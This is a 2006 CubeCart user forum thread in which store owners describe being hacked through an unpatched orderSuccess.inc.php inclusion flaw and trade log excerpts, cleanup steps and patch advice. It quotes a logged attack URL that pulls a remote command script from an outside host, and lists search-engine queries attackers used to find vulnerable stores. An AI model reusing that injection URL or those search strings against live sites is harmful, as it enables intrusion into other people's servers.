Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 How the hell do I fix this now? http://www.wood-b-treasures.com/ This is just f*cking wonderful. From my server logs I found 3 sites trying to access via //includes/ordersuccess... at 17 different times. Appearantly one was successful Blacklist these IP's on your sever...though I doubt that it will do any good. 153.5.37.202 62.141.50.117 82.59.68.239 Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 http://wood-b-treasures.com//includes/orde...order_id=1&glob[rootDir]=http://www.illusor.altervista.org/cmd.txt? _START_ 1,"login" => 1,"logout" => 1,"forgotPass" => 1,"account" => 1,"profile" => 1,"changePass" => 1,"newsletter" => 1,"cart" => 1,"step1" => 1,"step2" => 1,"step3" => 1,"step4" => 1,"step5" => 1,"reg" => 1,"viewOrders" => 1,"viewOrder" => 1,"confirmed" => 1); ?> _END_ Fatal error: Cannot instantiate non-existent class: htmlmimemail in /home/wooddbd/public_html/includes/orderSuccess.inc.php on line 40 This is an example of one of the 17 different instances that I find in my server logs Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 Oh and BTW...I'm talking to myself right now, but I had applied brooky's fix that was sent out via email, but had not yet updated to 3.0.7 or anything else yet. I had figured that was good enough. Quote Link to comment Share on other sites More sharing options...
Guest dorianrave Posted January 2, 2006 Share Posted January 2, 2006 My website was hacked too. Lost all my files. Thank god for back ups. Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 Didn't lose any files, but this is still ridiculous. This needs to be fixed! Ok I was looking through my server files and everything is there and there is no alternate index page so I have no idea how the hell they are doing this. Some sort of cross-site scripting perhaps? God I'm screwed someone please help! Quote Link to comment Share on other sites More sharing options...
Guest radicalwheels Posted January 2, 2006 Share Posted January 2, 2006 Hacked here too, but didn't do anything except get into admin and reset passwords, etc... Look at your index.php file Quote Link to comment Share on other sites More sharing options...
Guest Marshalls Posted January 2, 2006 Share Posted January 2, 2006 how are they doing it? why now all of a sudden this crap is going on? Quote Link to comment Share on other sites More sharing options...
Guest estelle Posted January 2, 2006 Share Posted January 2, 2006 Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched. Quote Link to comment Share on other sites More sharing options...
Guest radicalwheels Posted January 2, 2006 Share Posted January 2, 2006 Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched. I did, but had to change since I had customers checking out and getting errors and entering credit cards 2 and 3 times which lead to almost 3k in duplicate charges. I used Sir Williams fix at first. Now (since he updated) the orderSuccess.inc.php is working again. So patched again... Quote Link to comment Share on other sites More sharing options...
Guest gwizard Posted January 2, 2006 Share Posted January 2, 2006 LOL, you were owned by script kiddies Please insure that your PHP version is NO LESS then 4.1.0. If my your host is cloaked as Linux and you are in fact running Windows then please insure that your host admin applied all the neccessary patches. Also, if I were the host, I would apply IDS protection on the Router level that would deny frequent incoming from same IP's. This looks as less CC issue as host issue. Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 hmm...well I'm glad that YOU find this amusing Quote Link to comment Share on other sites More sharing options...
Guest aikdo Posted January 2, 2006 Share Posted January 2, 2006 Yo Bro Your Site Is Fixed, I took the liberty to upload the new index.php file for you... ill go through and make sure there are no Ping-markers in any of the other files... Quote Link to comment Share on other sites More sharing options...
Guest aikdo Posted January 2, 2006 Share Posted January 2, 2006 (edited) EVERYONE THAT HAS BEEN HACKED CHECK YOUR INCLUDES FOLDER IF YOU FIND ANY FILES OUT OF PLACE DELETE THEM ASAP... YOUR SERVERS WILL BE USED FOR THE NEXT ATTACK IF YOU DO NOT... DELETE NOW... PS. Wood-b-tresure you had 3 aha.php (contained a trojon) db.pl (could alter ANY of your database info) [email protected] (would be used on other servers alike) and finaly another folder was also in the includes called .tmp which again contained 2 other .pl scripts... I have removed these and am looking for more... BUT EVERYONE SHOULD CHECK THEIR SERVERS NOW!!!! Edited January 2, 2006 by aikdo Quote Link to comment Share on other sites More sharing options...
Guest aikdo Posted January 2, 2006 Share Posted January 2, 2006 One more note to Wood-be-tresure looking at OrderSuccess i found that it has not be patched with brookys Or Sir williams... That is where your vunrability has now shown up... Quote Link to comment Share on other sites More sharing options...
Guest vrakas Posted January 2, 2006 Share Posted January 2, 2006 Q: From where do they find our sites? :) Quote Link to comment Share on other sites More sharing options...
Guest timecrisis Posted January 2, 2006 Share Posted January 2, 2006 From links in your profile? I would urger all to remove links to your sites from the forum. It is bad practice (in my book) to post an links on dev forums like this one! Quote Link to comment Share on other sites More sharing options...
Guest estelle Posted January 2, 2006 Share Posted January 2, 2006 (edited) And they can find them through Google, at least all stores where the licence fee hasn't been paid. Yet another reason why everyone should buy a licence! Edited January 2, 2006 by estelle Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 Q: From where do they find our sites? Thank you Aikdo Well I thought that I had successfully patched but all that I had done was to install that image upload patch that had been sent out via email. So I guess it was my fault As to how they found the site...according to my server access logs they came in from doing a search for Powered by Cubecart 3.0.6... Quote Link to comment Share on other sites More sharing options...
Guest radicalwheels Posted January 2, 2006 Share Posted January 2, 2006 They did a search from Google for Powered by Cubecart 3.0.4 and came in that way for me. Licensed now... Quote Link to comment Share on other sites More sharing options...
Guest deebee Posted January 2, 2006 Share Posted January 2, 2006 Q: From where do they find our sites? Easy. Biggest search term on my stats today been "powered by cubecart 3.0.6" followed by "powered by cubecart" followed by "cubecart 3.0.6" Quote Link to comment Share on other sites More sharing options...
Guest aikdo Posted January 2, 2006 Share Posted January 2, 2006 same here http://www.cubecart.com/site/forums/index.php? allintext:powered by cubecart 3.0. intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart" powered by cubecart 3.0.6 "Powered by CubeCart" 3.0.6 .edu "powered by CubeCart 3.0.6" intext:powered by CubeCart 3.0.6 Powered by Cubecart All each used about 10 times luckily my sites are protected... Quote Link to comment Share on other sites More sharing options...
Guest estelle Posted January 2, 2006 Share Posted January 2, 2006 This looks as less CC issue as host issue. I guess you spoke before you read all the discussions about the security hole in CC? Quote Link to comment Share on other sites More sharing options...
Guest woodbtreasures Posted January 2, 2006 Share Posted January 2, 2006 he he Search results are still showing my skins site http://www.webdesignbyjeremy.com as 3.0.6 and they tried the order success includes again...this time unsuccessfully. I've done a fresh install of 3.0.7pl-1 and the can all kiss my a$$ :P Quote Link to comment Share on other sites More sharing options...
Al Brookbanks Posted January 3, 2006 Share Posted January 3, 2006 I'm pleased the patch definitely works but as Sir Will says it is a barrier and not absolute fix. There is a possibility they could find a way to break the barrier. I'm focused on making it even stronger and looking deeply into other possible vulnerabilities. Appologies for your inconvenience and stress associated with this malicious attack. I can only strive to try and prevent anything like this from happening again. Quote Link to comment Share on other sites More sharing options...
Guest timecrisis Posted January 3, 2006 Share Posted January 3, 2006 (edited) Yes, I would advise people to 1: Get a licence 2: Don't post your site URL's on here This is the first place black hats and script kiddies would look and they can read just aswell as you can...well the script kiddies maybe not =) Good idea on the job advert Brooky...Thanks for the updates Edited January 3, 2006 by timecrisis Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.